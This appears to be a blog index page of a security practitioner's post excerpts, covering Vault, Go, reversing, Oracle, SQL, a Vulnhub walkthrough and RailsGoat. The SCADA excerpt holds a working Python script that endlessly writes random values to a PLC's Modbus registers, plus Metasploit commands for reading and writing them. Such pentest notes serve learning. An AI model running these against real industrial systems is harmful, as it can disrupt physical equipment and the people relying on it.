HashiCorp Vault Research

Nice introduction: https://mycodesmells.com/post/introduction-to-vault Fun write-up: https://www.davidbegin.com/cubbyhole-backend-and-response-wrapping/ Token info: https://www.vaultproject.io/docs/concepts/tokens.html Cool dev implementation series with OSX and lastpass: https://blog.alanthatcher.io/fun-and-profit-with-vault-2/ https://blog.alanthatcher.io/fun-and-profit-with-vault-part-2/ https://blog.alanthatcher.io/fun-and-profit-with-vault-part-3/ Single-use implementation: https://www.slalom.com/thinking/managing-secrets-using-hashicorp-vault How-to on Ubuntu: https://www.digitalocean.com/community/tutorials/how-to-securely-manage-secrets-with-hashicorp-vault-on-ubuntu-16-04

July 2, 2018 · Jayson Grace

Golang Notes

Installation Ubuntu dl_link='https://dl.google.com/go/go1.15.7.linux-amd64.tar.gz' wget -c $dl_link -O - | sudo tar -xz -C /usr/local echo "" >> ~/.bashrc echo '# Golang exports' >> ~/.bashrc echo 'export PATH="$PATH:$:/usr/local/go/bin"' >> ~/.bashrc echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc # Test: go version Resource: https://golang.org/doc/install MacOS Install it: brew install golang Add the following to ~/.zshrc: export GOPATH=$HOME/programs/go # Set GOROOT since we're using brew export GOROOT="$(brew --prefix golang)/libexec" # Add go to PATH - so we can run executables from anywhere export PATH="$PATH:${GOPATH}/bin:${GOROOT}/bin" Resource: https://medium....

June 18, 2018 · Jayson Grace

Reversing Notes

Environment Setup VMWare everything in a VLAN Remnux linux box - has things like iptables rules which accept traffic from any ip that connects to it and a fake dns tool. Process Monitor Useful for seeing what processes are spawned with a given running program. Used to get real-time information. Process hacker is an open source alternative. Process Explorer Determine what files, DLLs, and registry keys are associated with open processes....

April 24, 2018 · Jayson Grace

Interfacing with Oracle DBs

This was so much of a pain in the ass to figure out that I decided that I would compile a whole post specifically around useful information for this topic. To get started, download SQLDeveloper through Oracle’s site (you’ll need to register). So far I’ve tested this on OSX. Establishing a connection Under the Connections tab, click the green plus button Specify Basic for the connection type Put in the Connection name, Username, Password, Hostname, and Port For SID, put in the hostname without the domain....

April 19, 2018 · Jayson Grace

SCADA Security Notes

Modbus write random registers from pymodbus.client.sync import ModbusTcpClient import multiprocessing import random from multiprocessing import TimeoutError client = ModbusTcpClient('[target]') client.connect() def write(reg): client.write_register(reg+1, random.randint(1, 100)) print('reg:' + str(reg)) if __name__ == '__main__': while True: p = multiprocessing.Pool(2) try: p.map(write, [x for x in range(20)]) except TimeoutError: pass except Exception as e: print(e) exit() client.close() Read and write data to a PLC with metasploit use auxiliary/scanner/scada/modbusclient set DATA_ADDRESS 1 set RHOST [target] set ACTION READ_REGISTERS set NUMBER 19 run

April 7, 2018 · Jayson Grace

Python Notes

This will encompass things that I find useful and end up looking up later when I haven’t coded in a while. Useful functions Read file line-by-line and print each line def print_lines(file): with open(file) as f: for line in f: print(line) Read file into list def return_list(file): with open(file) as f: list = f.readlines() return list Remove line from a file containing a specified string def remove_line_containing_string(file): f = open(file, 'r') contents = f....

January 3, 2018 · Jayson Grace

SQL Cheatsheet

Generic Update field UPDATE table_name SET column1 = value1, column2 = value2, ... WHERE condition; Get first row of data from table SELECT * FROM <table_name> LIMIT 1; Single-line comment -- stuff to comment out Multi-line comment /** stuff to comment out **/ Delete the last n rows from a table DELETE FROM `table` WHERE `table`.`tableID` in (SELECT TOP 500 tableID FROM table ORDER BY tableID DESC) Delete the first n rows from a table DELETE FROM `table` WHERE `table`....

November 29, 2017 · Jayson Grace

Modernizing Techvomit

In case it wasn’t obvious, this site runs on Ghost. I made this decision a couple of years ago on a 4 hour plane ride when I was bored, and wanted to kill two birds with one stone: start learning how some of the AWS services worked, and get a website going. At the time I didn’t really make the site very easy to maintain, and had to learn a couple of lessons over the years as a result....

October 2, 2017 · Jayson Grace

Vulnhub - Sedna

These are my notes from running through the Sedna vulnerable VM. Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities. Observe /license.txt - it will inform us that the target web application is running BuilderEngine. Search for an exploit we can use: searchsploit builderengine View the source for the exploit: searchsploit -x 40390 Copy the exploit code into exploit....

March 27, 2017 · Jayson Grace

RailsGoat Notes

This is the tutorial for the talk I gave on Web Application Vulnerabilities at the RubiABQ meetup on March 8th, 2017. Legal The below is not intended to provide details on how to compromise other people’s web sites and applications. The purpose is to inform developers on how to protect themselves from malicious users and attackers. The tools and methods listed should only be used on sites & applications which you directly own or have permission in writing to work on....

March 9, 2017 · Jayson Grace